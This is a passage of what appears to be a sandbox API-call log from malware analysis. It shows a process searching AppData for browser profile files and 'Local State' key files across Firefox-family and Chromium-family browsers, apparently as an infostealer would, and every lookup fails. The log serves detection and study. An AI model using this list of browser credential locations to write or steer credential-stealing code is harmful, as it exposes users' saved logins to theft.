returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\" [0109.018] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\..\\profiles.ini" [0109.018] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\waterfox\\profiles.ini")) returned 0xffffffff [0109.018] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19f328 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0109.018] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\8pecxstudios\\Cyberfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\" [0109.018] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\" [0109.018] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\..\\profiles.ini" [0109.018] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\8pecxstudios\\cyberfox\\profiles.ini")) returned 0xffffffff [0109.018] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19f320 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0109.019] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\NETGATE Technologies\\BlackHawk\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\" [0109.019] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\" [0109.019] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\..\\profiles.ini" [0109.019] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\netgate technologies\\blackhawk\\profiles.ini")) returned 0xffffffff [0109.019] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19f318 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0109.019] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Mozilla\\icecat\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\" [0109.019] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\" [0109.019] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\..\\profiles.ini" [0109.019] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\icecat\\profiles.ini")) returned 0xffffffff [0109.019] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19f310 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0109.019] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\K-Meleon\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\" [0109.019] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\" [0109.019] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\..\\profiles.ini" [0109.019] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\profiles.ini")) returned 0xffffffff [0109.020] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0109.020] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Opera Software\\Opera Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\" [0109.020] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\" [0109.020] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\Local State" [0109.020] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=79, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0109.020] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x9e) returned 0x3970048 [0109.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=79, lpWideCharStr=0x3970048, cchWideChar=79 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\Local State") returned 79 [0109.020] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a11c0 [0109.020] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.020] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera software\\opera stable\\local state")) returned 0xffffffff [0109.020] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.020] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.025] GetLastError () returned 0x3 [0109.025] SetLastError (dwErrCode=0x3) [0109.025] GetLastError () returned 0x3 [0109.025] SetLastError (dwErrCode=0x3) [0109.025] GetLastError () returned 0x3 [0109.025] SetLastError (dwErrCode=0x3) [0109.025] GetLastError () returned 0x3 [0109.025] SetLastError (dwErrCode=0x3) [0109.025] GetLastError () returned 0x3 [0109.025] SetLastError (dwErrCode=0x3) [0109.025] GetLastError () returned 0x3 [0109.025] SetLastError (dwErrCode=0x3) [0109.025] GetLastError () returned 0x3 [0109.025] SetLastError (dwErrCode=0x3) [0109.025] GetLastError () returned 0x3 [0109.025] SetLastError (dwErrCode=0x3) [0109.025] GetLastError () returned 0x3 [0109.025] SetLastError (dwErrCode=0x3) [0109.025] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x208009a, ftCreationTime.dwLowDateTime=0xb0, ftCreationTime.dwHighDateTime=0x208009a, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x16, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x717908, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="e")) returned 0xffffffff [0109.115] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0109.115] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Opera Software\\Opera GX Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\" [0109.115] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\" [0109.115] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\Local State" [0109.115] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a1478 [0109.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=82, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0109.115] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa4) returned 0x3970048 [0109.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=82, lpWideCharStr=0x3970048, cchWideChar=82 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\Local State") returned 82 [0109.115] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xb0) returned 0x29a11c0 [0109.115] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.116] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera software\\opera gx stable\\local state")) returned 0xffffffff [0109.116] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.116] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.116] GetLastError () returned 0x3 [0109.116] SetLastError (dwErrCode=0x3) [0109.116] GetLastError () returned 0x3 [0109.116] SetLastError (dwErrCode=0x3) [0109.116] GetLastError () returned 0x3 [0109.116] SetLastError (dwErrCode=0x3) [0109.116] GetLastError () returned 0x3 [0109.116] SetLastError (dwErrCode=0x3) [0109.116] GetLastError () returned 0x3 [0109.116] SetLastError (dwErrCode=0x3) [0109.116] GetLastError () returned 0x3 [0109.116] SetLastError (dwErrCode=0x3) [0109.116] GetLastError () returned 0x3 [0109.116] SetLastError (dwErrCode=0x3) [0109.116] GetLastError () returned 0x3 [0109.116] SetLastError (dwErrCode=0x3) [0109.116] GetLastError () returned 0x3 [0109.117] SetLastError (dwErrCode=0x3) [0109.117] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x20800a0, ftCreationTime.dwLowDateTime=0xb8, ftCreationTime.dwHighDateTime=0x20800a0, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x17, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x717528, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="t")) returned 0xffffffff [0109.117] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.117] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\" [0109.117] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\" [0109.117] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\\\" [0109.117] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\\\Local State" [0109.117] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=73, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0109.117] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x92) returned 0x3970048 [0109.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=73, lpWideCharStr=0x3970048, cchWideChar=73 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\\\Local State") returned 73 [0109.117] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a11c0 [0109.117] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.117] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\local state")) returned 0xffffffff [0109.117] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.118] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.118] GetLastError () returned 0x3 [0109.118] SetLastError (dwErrCode=0x3) [0109.118] GetLastError () returned 0x3 [0109.118] SetLastError (dwErrCode=0x3) [0109.118] GetLastError () returned 0x3 [0109.118] SetLastError (dwErrCode=0x3) [0109.118] GetLastError () returned 0x3 [0109.118] SetLastError (dwErrCode=0x3) [0109.118] GetLastError () returned 0x3 [0109.118] SetLastError (dwErrCode=0x3) [0109.118] GetLastError () returned 0x3 [0109.118] SetLastError (dwErrCode=0x3) [0109.118] GetLastError () returned 0x3 [0109.118] SetLastError (dwErrCode=0x3) [0109.118] GetLastError () returned 0x3 [0109.118] SetLastError (dwErrCode=0x3) [0109.119] GetLastError () returned 0x3 [0109.119] SetLastError (dwErrCode=0x3) [0109.119] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x208008e, ftCreationTime.dwLowDateTime=0xa0, ftCreationTime.dwHighDateTime=0x208008e, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x14, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x731238, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.119] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.119] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Chromium\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\" [0109.119] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\" [0109.119] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\\\" [0109.119] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\\\Local State" [0109.119] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=68, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0109.119] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x88) returned 0x3970048 [0109.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=68, lpWideCharStr=0x3970048, cchWideChar=68 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\\\Local State") returned 68 [0109.119] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a11c0 [0109.119] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.119] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chromium\\user data\\local state")) returned 0xffffffff [0109.119] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.120] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.120] GetLastError () returned 0x3 [0109.120] SetLastError (dwErrCode=0x3) [0109.120] GetLastError () returned 0x3 [0109.120] SetLastError (dwErrCode=0x3) [0109.120] GetLastError () returned 0x3 [0109.120] SetLastError (dwErrCode=0x3) [0109.120] GetLastError () returned 0x3 [0109.120] SetLastError (dwErrCode=0x3) [0109.120] GetLastError () returned 0x3 [0109.120] SetLastError (dwErrCode=0x3) [0109.120] GetLastError () returned 0x3 [0109.120] SetLastError (dwErrCode=0x3) [0109.120] GetLastError () returned 0x3 [0109.120] SetLastError (dwErrCode=0x3) [0109.120] GetLastError () returned 0x3 [0109.120] SetLastError (dwErrCode=0x3) [0109.120] GetLastError () returned 0x3 [0109.120] SetLastError (dwErrCode=0x3) [0109.120] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080084, ftCreationTime.dwLowDateTime=0x98, ftCreationTime.dwHighDateTime=0x6c0260, ftLastAccessTime.dwLowDateTime=0x7f, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7464d0, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.120] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.121] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Kometa\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\" [0109.121] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\" [0109.121] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\\\" [0109.121] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\\\Local State" [0109.121] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=66, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0109.121] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x84) returned 0x3970048 [0109.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=66, lpWideCharStr=0x3970048, cchWideChar=66 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\\\Local State") returned 66 [0109.121] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a11c0 [0109.121] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.121] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\kometa\\user data\\local state")) returned 0xffffffff [0109.121] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.121] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.121] GetLastError () returned 0x3 [0109.121] SetLastError (dwErrCode=0x3) [0109.121] GetLastError () returned 0x3 [0109.121] SetLastError (dwErrCode=0x3) [0109.121] GetLastError () returned 0x3 [0109.121] SetLastError (dwErrCode=0x3) [0109.121] GetLastError () returned 0x3 [0109.121] SetLastError (dwErrCode=0x3) [0109.121] GetLastError () returned 0x3 [0109.122] SetLastError (dwErrCode=0x3) [0109.122] GetLastError () returned 0x3 [0109.122] SetLastError (dwErrCode=0x3) [0109.122] GetLastError () returned 0x3 [0109.122] SetLastError (dwErrCode=0x3) [0109.122] GetLastError () returned 0x3 [0109.122] SetLastError (dwErrCode=0x3) [0109.122] GetLastError () returned 0x3 [0109.122] SetLastError (dwErrCode=0x3) [0109.122] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080080, ftCreationTime.dwLowDateTime=0x98, ftCreationTime.dwHighDateTime=0x6c0260, ftLastAccessTime.dwLowDateTime=0x7f, 